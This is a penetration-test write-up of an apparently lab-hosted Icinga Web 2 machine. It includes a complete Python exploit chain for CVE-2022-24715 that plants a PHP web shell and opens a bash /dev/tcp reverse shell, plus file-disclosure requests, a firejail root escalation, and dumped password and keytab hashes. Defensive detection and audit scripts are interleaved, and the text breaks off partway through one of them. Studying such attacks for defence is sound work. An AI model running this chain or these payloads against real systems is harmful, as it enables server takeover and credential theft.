Scanning
> TARGET=<target-ip> && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
8080/tcp open http syn-ack ttl 62 Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://icinga.cerberus.local:8080/icingaweb2
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
- Domain: icinga.cerberus.local
Arbitrary File Disclosure (CVE-2022-24716)
> curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/hosts -v
* Trying <target-ip>:8080...
* Connected to icinga.cerberus.local (<target-ip>) port 8080 (#0)
> GET /icingaweb2/lib/icinga/icinga-php-thirdparty/etc/hosts HTTP/1.1
> Host: icinga.cerberus.local:8080
> User-Agent: curl/7.87.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 19 Mar 2023 22:24:42 GMT
< Server: Apache/2.4.52 (Ubuntu)
< Cache-Control: public, max-age=1814400, stale-while-revalidate=604800
< Etag: 40210-125-5f3289e9ec540
< Last-Modified: Thu, 26 Jan 2023 10:57:49 GMT
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/plain;charset=UTF-8
<
127.0.0.1 iceinga.cerberus.local iceinga
127.0.1.1 localhost
172.16.22.1 DC.cerberus.local DC cerberus.local
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
* Connection #0 to host icinga.cerberus.local left intact
# /etc/passwd | grep home
matthew:x:1000:1000:matthew:/home/matthew:/bin/bash
> wfuzz -c -z file,/usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -u 'http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/FUZZ' --hc 404
000000001: 200 32 L 46 W 1717 Ch "/etc/passwd"
000000015: 200 23 L 206 W 1136 Ch "/etc/crontab"
000000005: 200 227 L 1115 W 7224 Ch "/etc/apache2/apache2.conf"
000000024: 200 10 L 30 W 293 Ch "/etc/hosts"
000000018: 200 12 L 90 W 657 Ch "/etc/fstab"
000000038: 200 2 L 5 W 26 Ch "/etc/issue"
000000025: 200 10 L 57 W 411 Ch "/etc/hosts.allow"
000000026: 200 17 L 111 W 711 Ch "/etc/hosts.deny"
000000048: 200 21 L 126 W 1524 Ch "/etc/mtab"
000000044: 200 4 L 6 W 104 Ch "/etc/lsb-release"
000000051: 200 29 L 174 W 1126 Ch "/etc/mysql/my.cnf"
000000055: 200 32 L 46 W 1717 Ch "/etc/passwd"
000000070: 200 27 L 97 W 582 Ch "/etc/profile"
000000053: 200 2 L 12 W 91 Ch "/etc/networks"
000000052: 200 12 L 33 W 270 Ch "/etc/network/interfaces"
000000083: 200 53 L 220 W 1650 Ch "/etc/ssh/ssh_config"
000000080: 200 23 L 142 W 920 Ch "/etc/resolv.conf"
000000081: 200 242 L 1486 W 8950 Ch "/etc/samba/smb.conf"
000000109: 200 65 L 390 W 3404 Ch "/proc/modules"
000000107: 200 47 L 163 W 1157 Ch "/proc/ioports"
000000106: 200 31 L 143 W 1350 Ch "/proc/interrupts"
000000108: 200 50 L 146 W 1391 Ch "/proc/meminfo"
000000104: 200 27 L 148 W 819 Ch "/proc/cpuinfo"
000000105: 200 31 L 55 W 367 Ch "/proc/filesystems"
000000110: 200 21 L 126 W 1524 Ch "/proc/mounts"
000000112: 200 2 L 10 W 100 Ch "/proc/swaps"
000000114: 200 2 L 15 W 156 Ch "/proc/self/net/arp"
000000111: 200 9 L 1494 W 3129 Ch "/proc/stat"
000000113: 200 1 L 23 W 179 Ch "/proc/version"
000000181: 200 0 L 0 W 0 Ch "/var/log/dpkg.log"
000000188: 200 0 L 1 W 32032 Ch "/var/log/faillog"
000000199: 200 0 L 2 W 292292 Ch "/var/log/lastlog"
000000224: 200 1 L 2 W 1152 Ch "/var/run/utmp"
000000220: 200 86 L 151 W 92142 Ch "/var/log/wtmp"
> wfuzz -c -z file,/usr/share/wordlists/PayloadsAllTheThings/File\ Inclusion/Intruders/Linux-files.txt -u 'http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/FUZZ' --hc 404
000000001: 200 32 L 46 W 1717 Ch "/etc/passwd"
000000003: 200 10 L 30 W 293 Ch "/etc/hosts"
000000007: 200 227 L 1115 W 7224 Ch "/etc/apache2/apache2.conf"
000000008: 200 15 L 46 W 320 Ch "/etc/apache2/ports.conf"
000000002: 200 63 L 63 W 825 Ch "/etc/group"
000000005: 200 2 L 5 W 26 Ch "/etc/issue"
000000017: 200 29 L 174 W 1126 Ch "/etc/mysql/my.cnf"
000000016: 200 355 L 1050 W 8181 Ch "/etc/init.d/apache2"
000000025: 200 1 L 3 W 80 Ch "/proc/cmdline"
000000024: 200 1 L 23 W 179 Ch "/proc/version"
000000026: 200 21 L 126 W 1524 Ch "/proc/mounts"
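The requests above all share one shape: a path below /icingaweb2/lib/<vendor>/<library>/ whose tail is an absolute system path, which an unpatched Icinga Web 2 resolved on the file system. As an added example (not code from the writeup), the Python below detects that pattern in Apache combined-format access logs: it parses each line, URL-decodes the request path, and flags any library-asset request whose tail starts with a system directory or contains a `..` segment. The log lines are constructed to mirror the curl and wfuzz traffic shown above; only the path prefix comes from the page.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Apache combined-log lines (not taken from the original page);
# they imitate the curl and wfuzz traffic above plus two benign requests.
SAMPLE_LOG = """\
10.10.14.5 - - [19/Mar/2023:22:24:42 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/etc/hosts HTTP/1.1" 200 293 "-" "curl/7.87.0"
10.10.14.5 - - [19/Mar/2023:22:25:01 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini HTTP/1.1" 200 180 "-" "curl/7.87.0"
10.10.14.5 - - [19/Mar/2023:22:25:02 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 404 196 "-" "Wfuzz/3.1.0"
10.10.14.9 - - [19/Mar/2023:22:26:10 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/vendor/autoload.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"
10.10.14.9 - - [19/Mar/2023:22:26:11 +0000] "GET /icingaweb2/authentication/login HTTP/1.1" 200 4512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)
# Icinga Web 2 serves bundled-library assets below /lib/<vendor>/<library>/;
# the tail after that prefix is what an unpatched version treated as a file path.
LIB_RE = re.compile(r"^/icingaweb2/lib/[^/]+/[^/]+/(?P<tail>.*)$")
SENSITIVE_ROOTS = {"etc", "proc", "var", "root", "home", "usr", "opt", "tmp", "dev", "sys", "boot"}


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_disclosure_attempt(path):
    """True when a library-asset request reaches outside the asset directory."""
    tail_match = LIB_RE.match(unquote(path).split("?", 1)[0])
    if not tail_match:
        return False
    segments = tail_match.group("tail").split("/")
    return ".." in segments or segments[0] in SENSITIVE_ROOTS


def find_disclosure_attempts(log_text):
    """All flagged requests; 'succeeded' marks the ones the server answered with 200."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_disclosure_attempt(rec["path"]):
            rec["succeeded"] = rec["status"] == 200
            hits.append(rec)
    return hits


def attempts_per_source(hits):
    """Count flagged requests per client address, to spot fuzzing runs."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    for h in find_disclosure_attempts(SAMPLE_LOG):
        print(h["ip"], h["status"], "served" if h["succeeded"] else "blocked", unquote(h["path"]))
    print(attempts_per_source(find_disclosure_attempts(SAMPLE_LOG)))
```

A 404 or 403 on a flagged path still counts as an attempt; the status only tells you whether the file was actually served, which is what decides between "probe" and "data exposure" during triage.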
# https://icinga.com/docs/icinga-web/latest/doc/03-Configuration/
> curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/config.ini
[global]
show_stacktraces = "1"
show_application_state_messages = "1"
config_backend = "db"
config_resource = "icingaweb2"
module_path = "/usr/share/icingaweb2/modules/"
[logging]
log = "syslog"
level = "ERROR"
application = "icingaweb2"
facility = "user"
[themes]
[authentication]
# https://icinga.com/docs/icinga-web/latest/doc/05-Authentication/
> curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/authentication.ini
[icingaweb2]
backend = "db"
resource = "icingaweb2"
> curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/roles.ini
[Administrators]
users = "matthew"
permissions = "*"
groups = "Administrators"
unrestricted = "1"
# https://icinga.com/docs/icinga-web/latest/doc/04-Resources/
> curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini
[icingaweb2]
type = "db"
db = "mysql"
host = "localhost"
dbname = "icingaweb2"
username = "matthew"
password = "IcingaWebPassword2023"
use_ssl = "0"
- This can be used to log in to the portal: matthew:IcingaWebPassword2023
RCE: www-data, CVE-2022-24715
import collections
import collections.abc
collections.Callable = collections.abc.Callable  # shim for bs4 releases that still reference collections.Callable
import requests
import bs4
import argparse
import random
import string

def get_csrf(resp):
    # every Icinga Web 2 form carries a CSRFToken hidden input; fetch the form first, then post with its token
    soup = bs4.BeautifulSoup(resp.text, "lxml")
    csrf_token = soup.find("input", {"id": "CSRFToken"})["value"]
    return csrf_token

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='lol')
    parser.add_argument('-i', '--ip', help='nc listener ip', required=True)
    parser.add_argument('-p', '--port', help='nc listener port', required=True)
    args = parser.parse_args()
    session = requests.session()
    # LOGIN
    URL = "http://icinga.cerberus.local:8080/icingaweb2/authentication/login"
    resp = session.get(URL)
    csrf_token = get_csrf(resp)
    data = {"username":"matthew","password":"IcingaWebPassword2023","rememberme":"0","redirect":"","formUID":"form_login","CSRFToken":csrf_token,"btn_submit":"Login"}
    resp = session.post(URL, data=data)
    # CHANGE MODULE PATH
    URL = "http://icinga.cerberus.local:8080/icingaweb2/config/general"
    resp = session.get(URL)
    csrf_token = get_csrf(resp)
    # the duplicated keys mirror the form's hidden/checkbox field pairs; Python keeps the last value ("1") for each
    data = {"global_show_stacktraces":"0","global_show_stacktraces":"1","global_show_application_state_messages":"0","global_show_application_state_messages":"1","global_module_path":"/dev/","global_config_resource":"icingaweb2","logging_log":"syslog","logging_level":"ERROR","logging_application":"icingaweb2","logging_facility":"user","themes_default":"Icinga","themes_disabled":"0","authentication_default_domain":"","formUID":"form_config_general","CSRFToken":csrf_token,"btn_submit":"Save Changes"}
    resp = session.post(URL, data=data)
    # ENABLE MODULE
    URL = "http://icinga.cerberus.local:8080/icingaweb2/config/moduleenable"
    resp = session.get(URL)
    csrf_token = get_csrf(resp)
    data = {"identifier":"shm","CSRFToken":csrf_token,"btn_submit":"btn_submit"}
    resp = session.post(URL, data=data)
    # UPLOAD SSH KEY
    URL = "http://icinga.cerberus.local:8080/icingaweb2/config/createresource"
    resp = session.get(URL)
    csrf_token = get_csrf(resp)
    # the key continuation lines must stay at column 0: the trailing backslash joins them into one string literal
    data = {"type":"ssh","name":"test","user":"test","private_key":"-----BEGIN RSA PRIVATE KEY-----\r\n\
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\r\n\
-----END RSA PRIVATE KEY-----","formUID":"form_config_resource","CSRFToken":csrf_token,"btn_submit":"Save Changes"}
    resp = session.post(URL, data=data)
    # EXPLOIT: WRITE PHP FILE
    URL = "http://icinga.cerberus.local:8080/icingaweb2/config/createresource"
    resp = session.get(URL)
    csrf_token = get_csrf(resp)
    data = {"type":"ssh","name":"asdf2","user":"../../../../../dev/shm/run.php","private_key":"file:///etc/icingaweb2/ssh/test\x00<?php system($_REQUEST['cmd']);?>","formUID":"form_config_resource","CSRFToken":csrf_token,"btn_submit":"Save Changes"}
    resp = session.post(URL, data=data)
    # GET REVERSE SHELL
    URL = "http://icinga.cerberus.local:8080/icingaweb2/shm/run"
    data = {"cmd":"bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'".format(args.ip,args.port)}
    session.post(URL, data=data)
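Both halves of this chapter leave traces in /etc/icingaweb2: the disclosed config.ini, resources.ini and roles.ini show the weak starting state (stack traces on, a cleartext database password over a non-TLS connection, a wildcard role), and the chain above rewrites module_path to /dev/ and creates an "ssh" resource whose user field is a traversal path. As an added example (not code from the writeup or from Icinga), the Python below audits those three files for exactly these conditions. The sample files are constructed copies of the ones disclosed above (password replaced by a placeholder); the tampered pair reproduces the post-exploit state; the expected module root is the packaged default from config.ini.

```python
import configparser
import posixpath

# Packaged default seen in the disclosed config.ini; used as the allow-listed module root.
EXPECTED_MODULE_ROOT = "/usr/share/icingaweb2/modules/"

# Constructed copies of the disclosed files (password replaced by a placeholder).
CONFIG_INI = """\
[global]
show_stacktraces = "1"
show_application_state_messages = "1"
config_backend = "db"
config_resource = "icingaweb2"
module_path = "/usr/share/icingaweb2/modules/"

[logging]
log = "syslog"
level = "ERROR"
application = "icingaweb2"
facility = "user"

[themes]

[authentication]
"""
RESOURCES_INI = """\
[icingaweb2]
type = "db"
db = "mysql"
host = "localhost"
dbname = "icingaweb2"
username = "matthew"
password = "EXAMPLE-PASSWORD"
use_ssl = "0"
"""
ROLES_INI = """\
[Administrators]
users = "matthew"
permissions = "*"
groups = "Administrators"
unrestricted = "1"
"""
# Constructed post-exploit state: module_path moved to /dev/ and a traversal "ssh" resource.
CONFIG_INI_TAMPERED = CONFIG_INI.replace('"/usr/share/icingaweb2/modules/"', '"/dev/"')
RESOURCES_INI_TAMPERED = RESOURCES_INI + """
[asdf2]
type = "ssh"
user = "../../../../../dev/shm/run.php"
"""


def load_ini(text):
    """Parse an Icinga Web 2 ini file into {section: {key: value}} with the quotes stripped."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return {s: {k: v.strip('"') for k, v in cp[s].items()} for s in cp.sections()}


def path_within(path, root):
    """True when path normalises to root or to something below it."""
    norm_root = posixpath.normpath(root)
    norm_path = posixpath.normpath(path)
    return norm_path == norm_root or norm_path.startswith(norm_root + "/")


def audit_icingaweb2(config_ini, resources_ini, roles_ini):
    """Return (severity, message) findings for the three configuration files."""
    findings = []
    glob = load_ini(config_ini).get("global", {})
    if glob.get("show_stacktraces") == "1":
        findings.append(("medium", "global.show_stacktraces=1 leaks file-system paths in error pages"))
    # module_path may list several colon-separated directories; each must stay under the packaged root
    for entry in filter(None, glob.get("module_path", "").split(":")):
        if not path_within(entry, EXPECTED_MODULE_ROOT):
            findings.append(("high", f"module_path entry {entry!r} is outside {EXPECTED_MODULE_ROOT}"))
    for name, res in load_ini(resources_ini).items():
        if res.get("type") == "db" and res.get("password") and res.get("use_ssl", "0") == "0":
            findings.append(("low", f"db resource {name!r} stores a cleartext password and use_ssl=0"))
        if res.get("type") == "ssh":
            user = res.get("user", "")
            # the ssh user doubles as the key file name under /etc/icingaweb2/ssh/, so it must be a bare name
            if "/" in user or "\\" in user or ".." in user:
                findings.append(("high", f"ssh resource {name!r} has a path-like user {user!r}"))
    for role, attrs in load_ini(roles_ini).items():
        if attrs.get("permissions") == "*" or attrs.get("unrestricted") == "1":
            findings.append(("info", f"role {role!r} is unrestricted (users: {attrs.get('users', '')})"))
    return findings


if __name__ == "__main__":
    for sev, msg in audit_icingaweb2(CONFIG_INI_TAMPERED, RESOURCES_INI_TAMPERED, ROLES_INI):
        print(f"[{sev}] {msg}")
```

Run it against the live /etc/icingaweb2 by reading the three files into the function; the two "high" findings are the ones worth alerting on immediately, since a module path pointing at /dev or a resource whose name escapes the ssh key directory is the footprint of the write primitive used above.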
Container PE: www-data to root
> python3 -c 'import pty; pty.spawn("/bin/bash")'
- Run two sessions for the exploit
# session 1
www-data@icinga:/tmp$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@icinga:/tmp$ python3 run.py
python3 run.py
You can now run 'firejail --join=4947' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.
# session 2
www-data@icinga:/usr/share/icingaweb2/public$ firejail --join=4947
firejail --join=4947
Warning: cleaning all supplementary groups
changing root to /proc/4947/root
Child process initialized in 15.48 ms
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
su
id
uid=0(root) gid=0(root) groups=0(root)
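The second session works because firejail runs setuid root and lets a caller join an existing sandbox; a service account such as www-data doing that is what a detection should key on. As an added example (not code from the writeup), the Python below correlates auditd SYSCALL and EXECVE records by their audit serial and raises an alert for every `firejail --join` executed by a non-root uid, then follows that process tree and alerts again if su or sudo is started underneath it. The records are constructed to model session 2 above plus one legitimate root-owned firejail run; the block assumes auditd is logging execve (for example an `-a always,exit -F arch=b64 -S execve -k exec` rule).

```python
import re

# Constructed auditd execve records (not from the page). Serials 501-503 model
# session 2 above: uid 33 (www-data) runs the setuid-root firejail with --join,
# gets a shell inside the joined sandbox and runs su. Serial 504 is a normal
# root-owned firejail invocation that must not trigger.
SAMPLE_AUDIT = """\
type=SYSCALL msg=audit(1679300000.101:501): arch=c000003e syscall=59 success=yes exit=0 ppid=4100 pid=5120 auid=4294967295 uid=33 gid=33 euid=0 suid=0 fsuid=0 egid=33 comm="firejail" exe="/usr/bin/firejail" key="exec"
type=EXECVE msg=audit(1679300000.101:501): argc=2 a0="firejail" a1="--join=4947"
type=SYSCALL msg=audit(1679300001.220:502): arch=c000003e syscall=59 success=yes exit=0 ppid=5120 pid=5121 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 comm="bash" exe="/usr/bin/bash" key="exec"
type=EXECVE msg=audit(1679300001.220:502): argc=1 a0="bash"
type=SYSCALL msg=audit(1679300002.330:503): arch=c000003e syscall=59 success=yes exit=0 ppid=5121 pid=5122 auid=4294967295 uid=33 gid=33 euid=0 suid=0 fsuid=0 egid=33 comm="su" exe="/usr/bin/su" key="exec"
type=EXECVE msg=audit(1679300002.330:503): argc=1 a0="su"
type=SYSCALL msg=audit(1679300003.440:504): arch=c000003e syscall=59 success=yes exit=0 ppid=1 pid=5200 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 comm="firejail" exe="/usr/bin/firejail" key="exec"
type=EXECVE msg=audit(1679300003.440:504): argc=3 a0="firejail" a1="--private" a2="firefox"
"""

SERIAL_RE = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_audit(text):
    """Merge the SYSCALL and EXECVE records that share a serial into one event per execve."""
    events = {}
    for line in text.splitlines():
        m = SERIAL_RE.search(line)
        if not m:
            continue
        ev = events.setdefault(int(m.group(2)), {"ts": float(m.group(1)), "argv": []})
        fields = {k: v.strip('"') for k, v in KV_RE.findall(line)}
        if fields.get("type") == "SYSCALL":
            ev.update(fields)
        elif fields.get("type") == "EXECVE":
            ev["argv"] = [fields.get(f"a{i}", "") for i in range(int(fields.get("argc", 0)))]
    return [events[s] for s in sorted(events)]


def detect_sandbox_join_abuse(text):
    """Alerts as (severity, rule, uid, pid, command line) tuples."""
    alerts = []
    tracked = set()  # pids living inside a sandbox that a non-root user joined
    for ev in parse_audit(text):
        argv, pid, ppid = ev["argv"], ev.get("pid"), ev.get("ppid")
        uid, euid = int(ev.get("uid", -1)), int(ev.get("euid", -1))
        is_join = ev.get("exe", "").endswith("/firejail") and any(a.startswith("--join") for a in argv)
        if is_join and uid != 0 and euid == 0:
            tracked.add(pid)
            # service accounts (uid < 1000) have no business joining sandboxes at all
            severity = "high" if uid < 1000 else "medium"
            alerts.append((severity, "firejail --join by unprivileged uid", uid, pid, " ".join(argv)))
        elif ppid in tracked:
            tracked.add(pid)  # keep following the process tree rooted at the join
            if argv and argv[0] in ("su", "sudo"):
                alerts.append(("high", "su/sudo inside joined sandbox", uid, pid, " ".join(argv)))
    return alerts


if __name__ == "__main__":
    for alert in detect_sandbox_join_abuse(SAMPLE_AUDIT):
        print(alert)
```

Joining one's own sandbox is normal desktop use, so the rule grades by uid: a join from a system account is the high-confidence signal, while one from an interactive user is a medium that the follow-on su/sudo rule upgrades.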
[*]RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*]AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*]AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : CERBERUS.LOCAL
SERVICE PRINCIPAL : ICINGA$/
NTLM HASH : af70cf6b33f1cce788138d459f676faf
AES-256 HASH : 38df579da95520b9489e85a22aec9d3ca4916d5b9a37ff6f0ecda8eec992479f
AES-128 HASH : 1241a65425ce5c7a0f06be09e8217274
root:$y$j9T$iDnIMFDR5Pjqp.dldRtrg0$FhxWiIqluAaMK39nxoUpj9epEDaPEXAbMxQIadWVAM4:19380:0:99999:7:::
matthew:$6$HkKm5zbYWwK3tAcR$btg9SAayzruD.TQj9VsJKL5sv2QceAZ2wWxkXvfj6xEtWO3YkkjusQVge/IBPgOt66sVssNEvAbjhR7fhJcg5.
User flag
- Found cached files under /var/lib/sss/db/
root@icinga:~# ls -ls /var/lib/sss/db/
ls -ls /var/lib/sss/db/
total 5028
1256 -rw-r--r-- 1 root root 1286144 Mar 19 20:52 cache_cerberus.local.ldb
4 -rw------- 1 root root 2715 Mar 2 12:33 ccache_CERBERUS.LOCAL
1256 -rw------- 1 root root 1286144 Mar 20 09:36 config.ldb
1256 -rw------- 1 root root 1286144 Jan 22 18:32 sssd.ldb
1256 -rw-r--r-- 1 root root 1286144 Mar 1 12:07 timestamps_cerberus.local.ldb
root@icinga:~# strings /var/lib/sss/db/cache_cerberus.local.ldb | grep '$6'
strings /var/lib/sss/db/cache_cerberus.local.ldb | grep '$6'
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0
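The listing above is the finding in itself: cache_cerberus.local.ldb is mode 0644, and with credential caching enabled it holds sha512crypt hashes of domain users, so anyone who can read the file can run them through john. As an added example (not code from the writeup), the Python below takes an `ls -ls` listing of /var/lib/sss/db and the bytes of each database, reports files readable by group or others, and counts the cached hashes in each; combining the two gives the severity. The listing is copied from the root shell above; the database contents are a constructed stand-in for the ldb records, not the real cache file.

```python
import re

# Listing copied from the root shell above.
SAMPLE_LS = """\
total 5028
1256 -rw-r--r-- 1 root root 1286144 Mar 19 20:52 cache_cerberus.local.ldb
4 -rw------- 1 root root 2715 Mar 2 12:33 ccache_CERBERUS.LOCAL
1256 -rw------- 1 root root 1286144 Mar 20 09:36 config.ldb
1256 -rw------- 1 root root 1286144 Jan 22 18:32 sssd.ldb
1256 -rw-r--r-- 1 root root 1286144 Mar 1 12:07 timestamps_cerberus.local.ldb
"""
# Constructed stand-in for the cache contents: NUL-separated ldb attribute
# fragments with one sha512crypt value under cachedPassword (salt and hash are dummies).
SAMPLE_CACHE = (
    b"\x00\x00name=matthew@cerberus.local,cn=users,cn=cerberus.local,cn=sysdb\x00"
    b"cachedPassword\x00$6$EXAMPLESALT$" + b"x" * 86 + b"\x00"
    b"lastCachedPasswordChange\x001678000000\x00"
)

LS_RE = re.compile(
    r"^\s*\d+\s+(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<name>.+)$"
)
# sha512crypt: $6$<salt up to 16 chars>$<86 chars of ./0-9A-Za-z>
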